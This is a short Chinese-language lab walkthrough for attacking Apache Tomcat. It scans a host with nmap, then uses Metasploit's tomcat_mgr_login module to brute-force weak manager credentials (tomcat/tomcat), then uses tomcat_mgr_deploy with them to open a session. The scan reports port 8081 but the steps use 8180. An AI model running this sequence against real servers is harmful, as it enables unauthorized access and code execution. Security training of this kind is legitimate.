實驗步驟:
1) 利用枚舉的方法破解Tomcat的弱口令。
實驗步驟:
一、利用nmap工具掃描目標主機
1.1 使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。
1.2 在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放8081端口並且運行着ApacheTomcat/CoyoteJSP engine1.1。
1.3 在終端中輸入命令“msfconsole”,啓動MSF終端。
1.4 在終端下輸入命令“search tomcat”, 搜索tomcat的相關工具和攻擊載荷。
1.5 在終端輸入“use auxiliary/scanner/http/tomcat_mgr_login”, 啓用漏洞利用模塊, 提示符就會提示進入到該路徑下。
1.6 在終端下輸入“set RHOSTS 192.168.1.3”,設置攻擊目標主機IP。
1.7 在終端下輸入“set RPORT 8180”,設置攻擊目標主機端口號。
1.8 在終端下輸入“exploit”, 實施攻擊。獲得用戶名tomcat,密碼tomcat。
1.9 在終端下輸入“use exploit/multi/http/tomcat_mgr_deploy”, 啓用漏洞利用模塊, 提示符就會提示進入到該路徑下。
1.10 在終端下輸入“set RHOST 192.168.1.3”,設置攻擊的目標主機IP。
1.11 在終端下輸入“set RPORT 8180”,設置攻擊目標主機端口號。
1.12 在終端下輸入“set username tomcat”,設置攻擊時使用的登錄賬號tomcat。
1.13 在終端下輸入“set password tomcat”,設置攻擊時使用的密碼tomcat。
1.14 在終端下輸入“exploit”,開始攻擊,建立會話。
轉自https://blog.csdn.net/smithjackhack/article/details/78563553